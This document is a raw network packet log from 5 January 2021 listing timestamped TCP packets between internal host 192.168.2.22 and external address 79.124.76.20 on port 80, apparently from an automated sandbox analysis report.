Jan 5, 2021 10:06:47.999238968 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:47.999249935 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:47.999360085 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:47.999393940 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:47.999598980 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:47.999624968 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.000940084 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.075020075 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.075107098 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.075124979 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.075159073 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.075324059 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.075378895 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.075423956 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.075555086 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.075572014 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.075609922 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.075809002 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.075824976 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.075896978 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.076006889 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.076028109 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.076080084 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.076229095 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.076255083 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.076478958 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.076489925 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.076503992 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.076545000 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.076729059 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.077181101 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.077228069 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.077464104 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.077483892 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.077528954 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.077542067 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.151778936 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.151801109 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.151897907 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.151946068 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.151993990 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.152067900 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.152112007 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.152199984 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.152261019 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.152353048 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.152405024 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.152507067 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.152542114 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.152559042 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.152671099 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.152781010 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.152797937 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.152844906 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.153013945 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.153028965 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.153096914 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.153234005 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.153274059 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.153340101 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.153480053 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.153496981 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.153583050 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.153709888 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.153724909 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.153803110 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.153928995 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.153951883 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.154006958 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.154231071 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.154247999 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.154303074 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.154319048 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.154514074 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.154557943 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.154625893 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.154642105 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.154731035 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.154835939 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.154869080 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.154944897 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.155065060 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.155109882 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.155163050 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.155360937 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.155378103 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.155431986 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.155596018 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.155622005 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.155699968 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.155822992 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.155852079 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.155929089 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.228518963 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.228555918 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.228595018 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.228614092 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.228629112 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.228686094 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.228836060 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.228869915 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.228931904 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.229120970 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.229149103 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.229206085 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.229279041 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.229311943 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.229393959 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.229527950 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.229578972 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.229665995 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.229767084 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.229804039 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.229967117 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.230009079 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.230051994 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.230076075 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.230094910 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.230196953 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.230320930 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.230454922 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.230556011 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.230565071 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.230691910 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.230758905 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.231024027 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.231045008 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.231085062 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.231187105 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.231220961 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.231241941 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.231323957 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.231467962 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.231493950 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.231549025 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.231580019 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.231683016 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.231750965 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.231942892 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.231971979 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.232137918 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.232163906 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.232367992 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.232397079 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.232594013 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.232619047 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.232714891 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.232794046 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.233037949 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.233068943 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.233290911 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.233316898 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.233491898 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.233521938 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.233572960 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.233793974 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.234869957 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.234982014 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.235868931 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.305088043 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.305119038 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.305214882 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.305421114 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.305457115 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.305474043 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.305636883 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.305670977 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.305850029 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.305939913 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.305970907 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.306029081 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.306045055 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.306279898 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.306304932 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.306437016 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.306440115 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.306464911 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.306678057 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.306704998 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.306787014 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.321772099 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.321808100 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.321849108 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.321878910 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.321899891 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.321919918 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.330678940 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.330770016 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.330795050 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.330858946 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.330878973 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.330899954 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.331075907 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.331120968 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.331314087 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.331340075 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.331366062 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.331486940 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.331502914 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.331535101 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.331760883 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.331787109 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.331867933 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.331873894 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.331995964 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.332026958 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.332182884 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.332231045 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.332251072 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.332365036 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.332425117 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.332472086 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.332633018 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.332633972 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.332705021 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.332763910 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.332791090 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.332863092 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.333029032 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.333053112 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.333128929 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.333236933 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.333261013 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.333314896 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.333471060 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.333504915 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.333704948 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.335088015 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.337605953 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.381932020 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.381966114 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.382024050 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.382164955 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.382252932 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.382297039 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.382395029 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.382510900 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.382575989 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.382575989 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.382710934 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.382756948 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.382836103 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.382952929 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.383033991 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.383068085 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.383274078 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.383344889 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.383353949 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.383444071 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.383496046 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.398442030 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.398576975 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.398598909 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.398713112 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.398718119 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.398972988 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.398996115 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.399008989 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.399183035 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.399209976 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.399400949 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.399435043 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.399633884 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.399672985 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.399755001 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.399876118 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.400060892 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.400084972 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.400202990 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.400248051 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.400254965 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.400274992 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.400399923 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.400505066 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.400546074 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.400552034 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.400644064 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.400803089 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.400881052 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.400901079 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.400979996 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.401120901 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.401154995 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.401211023 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.401292086 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.401312113 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.401437998 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.401519060 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.401637077 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.401675940 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.401684046 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.401738882 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.401894093 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.401963949 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.402137041 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.402173042 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.402230024 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.402321100 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.402354956 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.402501106 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.402556896 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.402580023 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.402640104 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.402826071 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.402854919 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.402910948 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.402997971 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.403033972 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.403074980 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.403249979 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.403271914 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.403312922 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.403456926 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.403481960 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.403568983 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.403676987 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.403708935 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.403846025 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.403935909 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.403961897 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.404011965 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.404160976 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.404195070 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.404385090 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.404406071 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.404602051 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.404625893 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.406286955 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.407313108 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.407345057 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.407435894 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.407566071 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.407654047 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.407665968 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.407672882 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.407803059 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.407860994 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.407964945 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.408031940 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.408103943 CET	49170	80	192.168.2.22	79.124.76.20
